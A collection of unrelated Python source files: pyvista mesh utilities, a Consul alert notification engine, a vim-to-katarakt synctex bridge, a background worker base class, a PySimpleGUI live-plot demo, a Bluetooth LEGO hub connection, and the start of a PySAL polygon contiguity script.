Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
wrappers = {
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Otherwise, we assume a VTK data object was passed
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
elif dataset is None:
return None
elif isinstance(dataset, np.ndarray):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
print(dataset.shape, dataset)
raise NotImplementedError('NumPy array could not be converted to PyVista.')
elif is_meshio_mesh(dataset):
return from_meshio(dataset)
elif dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
else:
raise NotImplementedError(f'Type ({type(dataset)}) not able to be wrapped into a PyVista mesh.')
try:
wrapped = wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return dataset # if not supported just passes the VTK data object
return wrapped
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
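# Illustrative sketch (editor addition): bounds follow VTK's
# (xmin, xmax, ymin, ymax, zmin, zmax) layout and the check is inclusive.
def _example_is_inside_bounds():
    bounds = (0.0, 1.0, 0.0, 1.0, 0.0, 1.0)
    inside = is_inside_bounds((0.5, 0.5, 1.0), bounds)   # True (inclusive)
    outside = is_inside_bounds((2.0, 0.5, 0.5), bounds)  # False
    return inside, outside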
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
points : np.ndarray
Size n by 3 array of points to fit a plane through
    return_meta : bool
        If True, also return the center and normal used to generate the plane.
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
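# Illustrative sketch (editor addition): fitting nearly coplanar points
# returns a pyvista.Plane plus, optionally, the center and normal taken from
# the SVD above.
def _example_fit_plane_to_points():
    pts = np.random.random((100, 3))
    pts[:, 2] *= 0.01  # squash into an approximately z = 0 plane
    plane, center, normal = fit_plane_to_points(pts, return_meta=True)
    return plane, center, normal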
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({mesh.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) ' +
f'must match either the number of points ({mesh.n_points}) ' +
f'or the number of cells ({mesh.n_cells}).')
def generate_plane(normal, origin):
"""Return a vtk.vtkPlane."""
plane = vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the current
environment. Returns ``True`` if depth peeling is available and has been
successfully leveraged, otherwise ``False``.
"""
# Try Depth Peeling with a basic scene
source = vtk.vtkSphereSource()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
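# Illustrative sketch (editor addition): the decorated function returns the
# started ``Thread`` so callers can ``join`` it when they need to wait for
# the side effect to finish.
@threaded
def _example_background_log(message):
    logging.debug('background task says: %s', message)
# worker_thread = _example_background_log('hello')
# worker_thread.join()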
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
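# Illustrative sketch (editor addition): only decorate when a flag is set;
# ``_EXAMPLE_USE_THREADS`` is a hypothetical flag for this sketch.
_EXAMPLE_USE_THREADS = False
@conditional_decorator(threaded, _EXAMPLE_USE_THREADS)
def _example_maybe_threaded():
    # Runs synchronously here because the condition is False, so
    # ``conditional_decorator`` returns the function unchanged.
    return 42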
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
    This must be used in a ``with`` context, and it will block keyboard
    interrupts from happening until the exit event, as interrupts would crash
    the kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
    Prevents a class from being instantiated, similar to abc.ABCMeta,
    but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
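# Illustrative sketch (editor addition): the decorated base class cannot be
# instantiated directly, but its subclasses can.
@abstract_class
class _ExampleAbstractBase:
    pass
class _ExampleConcrete(_ExampleAbstractBase):
    pass
# _ExampleAbstractBase()  -> TypeError: ... is an abstract class ...
# _ExampleConcrete()      -> works, because cls is not the decorated class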
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis.
Parameters
----------
points : numpy.ndarray
Array of points with shape ``(N, 3)``
angle : float
Rotation angle.
inplace : bool, optional
Updates points in-place while returning nothing.
deg : bool, optional
If `True`, the angle is interpreted as degrees instead of
radians. Default is `True`.
axis : str, optional
Name of axis to rotate about. Valid options are ``'x'``, ``'y'``,
and ``'z'``. Default value is ``'z'``.
Returns
-------
points : numpy.ndarray
Rotated points.
Examples
--------
Rotate a set of points by 90 degrees about the x-axis in-place.
>>> import numpy as np
>>> import pyvista
>>> from pyvista import examples
>>> points = examples.load_airplane().points
>>> points_orig = points.copy()
>>> pyvista.axis_rotation(points, 90, axis='x', deg=True, inplace=True)
>>> assert np.all(np.isclose(points[:, 0], points_orig[:, 0]))
>>> assert np.all(np.isclose(points[:, 1], -points_orig[:, 2]))
>>> assert np.all(np.isclose(points[:, 2], points_orig[:, 1]))
"""
axis = axis.lower()
axis_to_vec = {
'x': (1, 0, 0),
'y': (0, 1, 0),
'z': (0, 0, 1)
}
if axis not in axis_to_vec:
raise ValueError('Invalid axis. Must be either "x", "y", or "z"')
rot_mat = transformations.axis_angle_rotation(axis_to_vec[axis], angle, deg=deg)
return transformations.apply_transformation_to_points(rot_mat, points, inplace=inplace)
|
NotificationEngine.py
|
import requests
import consulate
import json as json
import smtplib
import string
import sys
import settings
import plugins
import utilities
from multiprocessing import Process
class NotificationEngine(object):
"""
    NotificationEngine routes given ConsulHealthNodeStruct objects
    using the available plugins, based on the tags in ConsulHealthNodeStruct.
    ConsulHealthNodeStruct is a Python object representation of
{
"Node": "foobar",
"CheckID": "service:redis",
"Name": "Service 'redis' check",
"Status": "passing",
"Tags": [],
"Notes": "",
"Output": "",
"ServiceID": "redis",
"ServiceName": "redis"
}
Example use:
NotificationEngine([ConsulHealthNodeStruct,ConsulHealthNodeStruct]).Run()
"""
def __init__(self, alert_list, consulate_session):
"""consul_watch_handler_checks, will send a list of ConsulHealthNodeStruct
Arguments:
alert_list: List of ConsulHealthNodeStruct Object
consulate_session: Consulate object
"""
self.alert_list = alert_list
self.consul = consulate_session
def __getattr__(self, item):
return None
def get_available_plugins(self):
try:
self.available_plugins = set(
json.loads(self.consul.kv[settings.KV_ALERTING_AVAILABLE_PLUGINS]))
settings.logger.info(
"Plugins available, Plugins={plug}".format(
plug=list(self.available_plugins)))
return self.available_plugins
except TypeError:
settings.logger.error(
"Could not obtain alerting"
"plugins from ConsulURI=%{location}".format(
location=settings.KV_ALERTING_AVAILABLE_PLUGINS))
raise
def get_unique_tags_keys(self):
"""
find unique tags in the list of ConsulHealthNodeStruct objects, used to determine which plugins to load
"""
# python 2.6 syntax
self.unique_tags = set(
tag for obj in self.alert_list for tag in obj.Tags)
settings.logger.info("Unique tags found,"
"Tags={tags}".format(tags=list(self.unique_tags)))
return self.unique_tags
def load_plugins_from_tags(self):
# set intersection of unique_tags and available_plugins
configurations_files_to_load = self.unique_tags.intersection(
self.available_plugins)
settings.logger.info(
"Configuration files to load,"
"Configurations={configs}".format(configs=list(configurations_files_to_load)))
if "hipchat" in configurations_files_to_load:
self.hipchat = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_HIPCHAT, "rooms")
if "slack" in configurations_files_to_load:
self.slack = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_SLACK, "rooms")
if "mailgun" in configurations_files_to_load:
self.mailgun = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_MAILGUN, "teams")
if "email" in configurations_files_to_load:
self.email = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_EMAIL, "teams")
if "pagerduty" in configurations_files_to_load:
self.pagerduty = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_PAGERDUTY, "teams")
if "influxdb" in configurations_files_to_load:
self.influxdb = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_INFLUXDB, "databases")
if "cachet" in configurations_files_to_load:
self.cachet = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_CACHET)
if "elasticsearchlog" in configurations_files_to_load:
self.elasticsearchlog = utilities.load_plugin(
settings.KV_ALERTING_NOTIFY_ELASTICSEARCHLOG)
return (self.hipchat, self.slack, self.mailgun,
self.email, self.pagerduty, self.influxdb, self.elasticsearchlog)
def message_pattern(self, obj):
if obj.ServiceName or obj.ServiceID:
message_template = "Service {name}: "\
"is in a {state} state on {node}. "\
"Output from check: {output}".format(name=obj.ServiceName,
state=obj.Status,
node=obj.Node,
output=obj.Output)
else:
message_template = "System Check {name}: is "\
"in a {state} state on {node}. "\
"Output from check: {output}".format(name=obj.CheckID,
state=obj.Status,
node=obj.Node,
output=obj.Output)
return message_template
def run_notifiers(self, obj):
message_template = self.message_pattern(obj)
if "hipchat" in obj.Tags and self.hipchat:
common_notifiers = utilities.common_notifiers(
obj, "rooms", self.hipchat)
hipchat = self.hipchat
_ = Process(target=plugins.notify_hipchat, args=(obj, message_template,
common_notifiers,
hipchat)).start()
if "slack" in obj.Tags and self.slack:
common_notifiers = utilities.common_notifiers(
obj, "rooms", self.slack)
slack = self.slack
_ = Process(target=plugins.notify_slack, args=(message_template,
common_notifiers,
slack)).start()
if "mailgun" in obj.Tags and self.mailgun:
common_notifiers = utilities.common_notifiers(
obj, "teams", self.mailgun)
mailgun = self.mailgun
_ = Process(target=plugins.notify_mailgun, args=(message_template,
common_notifiers,
mailgun)).start()
if "email" in obj.Tags and self.email:
common_notifiers = utilities.common_notifiers(
obj, "teams", self.email)
email = self.email
_ = Process(target=plugins.notify_email, args=(message_template,
common_notifiers,
email)).start()
if "pagerduty" in obj.Tags and self.pagerduty:
common_notifiers = utilities.common_notifiers(
obj, "teams", self.pagerduty)
pagerduty = self.pagerduty
_ = Process(target=plugins.notify_pagerduty, args=(obj,
message_template,
common_notifiers,
pagerduty)).start()
if "influxdb" in obj.Tags and self.influxdb:
common_notifiers = utilities.common_notifiers(
obj, "databases", self.influxdb)
influxdb = self.influxdb
_ = Process(target=plugins.notify_influxdb, args=(obj, message_template,
common_notifiers,
influxdb)).start()
if "cachet" in obj.Tags and self.cachet:
_ = Process(target=plugins.notify_cache, args=(obj, message_template, self.cachet)).start()
if "elasticsearchlog" in obj.Tags and self.elasticsearchlog:
_ = Process(target=plugins.notify_elasticsearchlog, args=(obj, message_template,
self.elasticsearchlog)).start()
def Run(self):
self.get_available_plugins()
self.get_unique_tags_keys()
self.load_plugins_from_tags()
for obj in self.alert_list:
self.run_notifiers(obj)
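# Illustrative usage sketch (editor addition, not part of the application):
# ``message_pattern`` only reads the attributes below, so a lightweight
# stand-in object is enough to preview the rendered alert text.
def _example_message_pattern():
    from collections import namedtuple
    FakeCheck = namedtuple(
        'FakeCheck', 'Node CheckID Name Status Tags Notes Output ServiceID ServiceName')
    check = FakeCheck('foobar', 'service:redis', "Service 'redis' check",
                      'critical', [], '', 'connection refused', 'redis', 'redis')
    return NotificationEngine([check], None).message_pattern(check)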
|
synctex-katarakt-vim.py
|
#!/usr/bin/env python3
# Dependencies (Debian/Ubuntu package names):
#
# python3-gi
# python3-dbus
#
# Thorsten Wißmann, 2015
# in case of bugs, contact: edu _at_ thorsten-wissmann _dot_ de
def print_help():
print("""Usage: {0} SESSIONNAME [PDFFILE]
A katarakt wrapper for synctex communication between vim and katarakt.
SESSIONNAME is the name of your vim session, i.e. you have to start a vim
session *yourself* and *beforehand* with
vim --servername SESSIONNAME
Behaviour:
This script starts katarakt for PDFFILE. If no PDFFILE is specified, it tries
to autodetect the correct pdf file (by finding a corresponding .synctex.gz
file in the current directory).
It registers a keybinding in vim (per default "ZE"), to jump to the
corresponding page in katarakt. The vim keybinding can be overwritten by the
VIM_KEY environment variable.
If Katarakt emits the edit signal (usually on Ctrl+LeftMouse), then it
opens the corresponding tex file in vim and jumps to the corresponding
line in the texfile.
If the user presses ZE in the editor, a message is sent to this script.
This script calls synctex and sends the pdf-coordinates to katarakt.
When katarakt quits, then this script exits as well.
Requirements:
You need to compile the latex document using the option -synctex=1 in order to
obtain the required .synctex.gz file.
Hint: VIM configuration:
Add the following line to your vimrc:
au BufRead *.tex execute "nmap ZE :! synctex-katarakt-vim " . v:servername . " 2>/dev/null >/dev/null &<LEFT><LEFT>"
When typing ZE the first time, it automatically calls this script, overwrites
the ZE keybinding, and opens a katarakt instance. After typing ZE the first
time, you are prompted such that you can specify an alternate PDF file. If
you want an alternate vim keybinding (e.g. <Leader>f), add this line:
au BufRead *.tex execute "nmap ZF :! VIM_KEY='ZF' synctex-katarakt-vim " . v:servername . " 2>/dev/null >/dev/null &<LEFT><LEFT>"
If your key contains something like <Leader> (or other keys containing "<"),
escape it properly in the VIM_KEY= assignment.
""".format(sys.argv[0]))
from gi.repository import GLib
import sys
import dbus
import dbus.service
import subprocess
import time # only for sleep()
import threading
import os
import re # for regular expressions
from dbus.mainloop.glib import DBusGMainLoop
# tell dbus that we use the gobject main loop
DBusGMainLoop(set_as_default=True)
loop = GLib.MainLoop()
#########################################
# Settings #
#########################################
def detect_synctexfile():
# try to find the synctex.gz file in the current directory
    a = re.compile(r".*\.synctex\.gz$")
files = [f for f in os.listdir('.') if os.path.isfile(f) and a.match(f)]
return files
def die(msg):
print(msg)
exit(1)
try:
session_name = sys.argv[1]
except IndexError:
print_help()
exit(0)
if session_name == "-h" or session_name == "--help":
print_help()
exit(0)
try:
pdf_filename = sys.argv[2]
except IndexError:
try:
synctex_filename = detect_synctexfile()[0]
        pdf_filename = re.sub(r"\.synctex\.gz$", ".pdf", synctex_filename)
print("auto-detected {0}".format(pdf_filename))
except IndexError:
die("no *.synctex.gz file found in current directory")
vim_session = session_name
vim_view_keybind = os.getenv('VIM_KEY', 'ZE')
pdfprocess = subprocess.Popen(['katarakt', '--single-instance', 'false', pdf_filename])
pdf_pid = pdfprocess.pid
view_command = ("qdbus katarakt.pid%d" % pdf_pid +
" / katarakt.SourceCorrelate.view" +
" %{output} %{page} %{x} %{y}")
# connect to dbus
bus = dbus.SessionBus()
# wait for katarakt to show up
# it doesn't seem to be trivial to wait for an
# application to show up at dbus. hence the (still racy) hack
katarakt_booted = False
while pdfprocess.pid is not None and not katarakt_booted:
try:
katarakt = bus.get_object('katarakt.pid%d' % pdf_pid, '/')
iface = dbus.Interface(katarakt, 'katarakt.SourceCorrelate')
katarakt_booted = True
except dbus.exceptions.DBusException:
time.sleep(0.01)
# register an own service on the session bus
busName = dbus.service.BusName('katarakt.synctex.vim.' + session_name,
bus = dbus.SessionBus())
class BridgeObject(dbus.service.Object):
def __init__(self, object_path):
dbus.service.Object.__init__(self, busName,
object_path)
@dbus.service.method(dbus_interface='katarakt.bridge',
in_signature='sii', out_signature='')
def View(self, filename, line, col):
subprocess.call([
"synctex", "view",
"-i", "%d:%d:%s" % (line,col,filename),
"-o", pdf_filename,
"-x", view_command,
])
# create the dbus object and bind it to the bus
BridgeObject('/')
# inject the keybinding for viewing into the vim session
returncode = subprocess.call([
"vim", "--servername", vim_session,
"--remote-send",
("<ESC>:map %s" % vim_view_keybind
+ " :exec \"execute ('!qdbus katarakt.synctex.vim.%s" % session_name
+ " / katarakt.bridge.View % ' . line('.') . ' 0')\"<lt>CR><lt>CR><CR><CR>")
])
if returncode != 0:
print("Error when trying to register keybinding in the vim session \"{0}\"".format(vim_session))
exit(1)
# callback if the signal for edit is sent by katarakt
def on_edit(filename,page,x,y):
#print ("go to page %d at %d,%d" % (page,x,y))
subprocess.call([
"synctex", "edit",
"-o", ("%d:%d:%d:%s" % (1+page,x,y,filename)),
"-x", "vim --servername '" + vim_session + "' --remote-silent '+%{line}' %{input}",
])
iface.connect_to_signal("edit", on_edit)
# Main loop and cleanup:
def quit_if_pdf_exits():
pdfprocess.wait()
loop.quit()
thread = threading.Thread(target=quit_if_pdf_exits, args=())
thread.start()
loop.run()
|
base_worker.py
|
#!/usr/bin/python
#
# Copyright 2018-2022 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import os
import threading
class BaseWorker:
NAME = None
def __init__(self):
assert self.NAME, "Worker class `{}` must have a valid name.".format(
self.__class__.__name__
)
self._lock = threading.Lock()
self._thread = None
self._thread_for_pid = None
def is_alive(self):
if self._thread_for_pid != os.getpid():
return False
return bool(self._thread and self._thread.is_alive())
def is_running(self):
if self.is_alive():
return
self.start()
def start(self):
self._lock.acquire()
try:
if not self.is_alive():
self._thread = threading.Thread(target=self._target, name=self.NAME)
                self._thread.daemon = True
self._thread.start()
self._thread_for_pid = os.getpid()
finally:
self._lock.release()
atexit.register(self.atexit)
def atexit(self):
raise NotImplementedError("Worker must implement `atexit` function.")
def _target(self):
raise NotImplementedError("Worker must implement `target` function.")
|
Demo_Matplotlib_Animated_FuncAnimation.py
|
import PySimpleGUI as sg
import matplotlib.pyplot as plt
from matplotlib import style
import matplotlib.animation as animation
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from random import randint
import time
import threading
# Usage of MatPlotLib with matplotlib.animation for better performance
def main():
sg.theme('DarkBlue14')
layout = [[sg.Text('Live Plot Matplotlib - FuncAnimation')],
[sg.Canvas(k="-CANVAS-")],
[sg.Button('Start'), sg.Button('Stop'), sg.Exit()]]
window = sg.Window('Live Plot Matplotlib - FuncAnimation', layout, size=(640, 580),
location=(50, 50), finalize=True, element_justification="center", font="Calibri 18",
resizable=True)
canvas_elem = window['-CANVAS-']
canvas = canvas_elem.TKCanvas
style.use("ggplot")
global ax
f, ax = plt.subplots(figsize=(10, 4.4), dpi=100)
canvas = FigureCanvasTkAgg(f, canvas)
canvas.draw()
canvas.get_tk_widget().pack(side='top', fill='both', expand=1)
global xar
global yar
xar = [1, 2, 3, 4]
yar = [10, 5, 3, 5]
ani = animation.FuncAnimation(f, animate, interval=1000)
while True: # The Event Loop
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Exit':
break
elif event == "Start":
global thread
thread = True
x = threading.Thread(target=live_plotting, daemon=True)
x.start()
elif event == "Stop":
thread = False
window.close()
def animate(i):
global ax
global xar
global yar
ax.clear()
ax.plot(xar, yar, color='orange')
ax.set_title("Live Plot")
ax.set_xlabel('X-Label', fontsize=10)
ax.set_ylabel('Y-Label', fontsize='medium')
def live_plotting():
global xar
global yar
global thread
while thread:
xar.append(xar[len(xar) - 1] + 1)
yar.append(randint(0, 10))
time.sleep(1)
if __name__ == '__main__':
main()
|
cbluepy.py
|
import logging
import re
from threading import Thread, Event
from bluepy import btle
from pylgbst.comms import Connection
from pylgbst.utilities import str2hex, queue
log = logging.getLogger('comms-bluepy')
COMPLETE_LOCAL_NAME_ADTYPE = 9
PROPAGATE_DISPATCHER_EXCEPTION = False
def _get_iface_number(controller):
"""bluepy uses iface numbers instead of full names."""
if not controller:
return None
m = re.search(r'hci(\d+)$', controller)
if not m:
raise ValueError('Cannot find iface number in {}.'.format(controller))
return int(m.group(1))
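# Illustrative sketch (editor addition): controller names such as 'hci0'
# map to the integer iface index bluepy expects; anything else raises.
def _example_get_iface_number():
    assert _get_iface_number('hci0') == 0
    assert _get_iface_number(None) is None
    try:
        _get_iface_number('usb0')
    except ValueError:
        pass  # expected: no trailing hciN pattern to parse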
class BluepyDelegate(btle.DefaultDelegate):
def __init__(self, handler):
btle.DefaultDelegate.__init__(self)
self._handler = handler
def handleNotification(self, cHandle, data):
log.debug('Incoming notification')
self._handler(cHandle, data)
# We need a separate thread to wait for notifications,
# but calling peripheral's methods from different threads creates issues,
# so we will wrap all the calls into a thread
class BluepyThreadedPeripheral(object):
def __init__(self, addr, addrType, controller):
self._call_queue = queue.Queue()
self._addr = addr
self._addrType = addrType
self._iface_number = _get_iface_number(controller)
self._disconnect_event = Event()
self._dispatcher_thread = Thread(target=self._dispatch_calls)
        self._dispatcher_thread.daemon = True
        self._dispatcher_thread.name = "Bluepy call dispatcher"
self._dispatcher_thread.start()
def _dispatch_calls(self):
self._peripheral = btle.Peripheral(self._addr, self._addrType, self._iface_number)
try:
while not self._disconnect_event.is_set():
try:
try:
method = self._call_queue.get(False)
method()
except queue.Empty:
pass
self._peripheral.waitForNotifications(1.)
except Exception as ex:
log.exception('Exception in call dispatcher thread', exc_info=ex)
if PROPAGATE_DISPATCHER_EXCEPTION:
log.error("Terminating dispatcher thread.")
raise
finally:
self._peripheral.disconnect()
def write(self, handle, data):
self._call_queue.put(lambda: self._peripheral.writeCharacteristic(handle, data))
def set_notify_handler(self, handler):
delegate = BluepyDelegate(handler)
self._call_queue.put(lambda: self._peripheral.withDelegate(delegate))
def disconnect(self):
self._disconnect_event.set()
class BluepyConnection(Connection):
def __init__(self, controller='hci0'):
Connection.__init__(self)
self._peripheral = None # :type BluepyThreadedPeripheral
self._controller = controller
def connect(self, hub_mac=None):
log.debug("Trying to connect client to MoveHub with MAC: %s", hub_mac)
scanner = btle.Scanner()
while not self._peripheral:
log.info("Discovering devices...")
scanner.scan(1)
devices = scanner.getDevices()
for dev in devices:
address = dev.addr
addressType = dev.addrType
name = dev.getValueText(COMPLETE_LOCAL_NAME_ADTYPE)
if self._is_device_matched(address, name, hub_mac):
self._peripheral = BluepyThreadedPeripheral(address, addressType, self._controller)
break
return self
def disconnect(self):
self._peripheral.disconnect()
def write(self, handle, data):
log.debug("Writing to handle %s: %s", handle, str2hex(data))
self._peripheral.write(handle, data)
def set_notify_handler(self, handler):
self._peripheral.set_notify_handler(handler)
def is_alive(self):
return True
|
numpy_weights_verbose.py
|
#Contiguity using apply_async
import pysal as ps
from collections import defaultdict
import multiprocessing as mp
import time
import sys
import ctypes
import numpy as np
from numpy.random import randint
def check_contiguity(checks,lock,weight_type='ROOK'):
cid = mp.current_process()._name
geoms = np.frombuffer(sgeoms)
geoms.shape = (2,geoms.shape[0] / 2)
offsets = np.frombuffer(soffsets) #This is float, but should be int...
contmatrix = np.frombuffer(scontmatrix)
contmatrix.shape = (len(offsets), len(offsets))
if weight_type == 'ROOK':
for polys in checks:
potential_neigh = polys.tolist()
vertices = {}
for poly in polys:
vstart = 0
vend = offsets[poly]
if poly - 1 > 0:
vstart = offsets[int(poly) - 1]
vertices[poly] = geoms[:,vstart:vend]
for k, v in vertices.iteritems():
potential_neigh.remove(k)
root_geom = v
for neigh in potential_neigh:
test_geom = vertices[neigh]
#If the geoms share a common vertex, we need to test for a common edge.
xintersects = np.intersect1d(root_geom[0], test_geom[0])
if len(xintersects) > 1:
yintersects = np.intersect1d(root_geom[1], test_geom[1])
if len(yintersects) > 1:
#We have two shared points - are they adjacent in the poly geom, i.e. an edge?
x1root = np.where(root_geom[0] == xintersects[0])[0]
x2root = np.where(root_geom[0] == xintersects[1])[0]
if np.absolute(x1root - x2root).any() == 1:
x1test = np.where(test_geom[0] == xintersects[0])[0]
x2test = np.where(test_geom[0] == xintersects[1])[0]
if np.absolute(x1test - x2test).any() == 1:
with lock:
contmatrix[k, neigh] += 1
contmatrix[neigh, k] += 1
def global_pointers(_cgeoms, _coffsets, _contmatrix):
global sgeoms
global soffsets
global scontmatrix
sgeoms = _cgeoms
soffsets = _coffsets
scontmatrix = _contmatrix
if __name__ == "__main__":
if len(sys.argv) > 1:
cores = int(sys.argv[1])
else:
cores = mp.cpu_count()
#print "This version uses apply_async with a callback function and {0} cores.".format(cores)
#fnames = ['1024_lattice.shp', '10000_lattice.shp', '50176_lattice.shp', '100489_lattice.shp', '1000_poly.shp', '10000_poly.shp', '50000_poly.shp', '100000_poly.shp']
fnames = ['2500_poly.shp']
for fname in fnames:
ta = time.time() #Global time keeper
t1 = time.time()
#Phase 1: Bin the shapefile
shpFileObject = ps.open(fname)
t2 = time.time()
print "Reading the shapefile took {} seconds".format(t2-t1)
t1 = time.time()
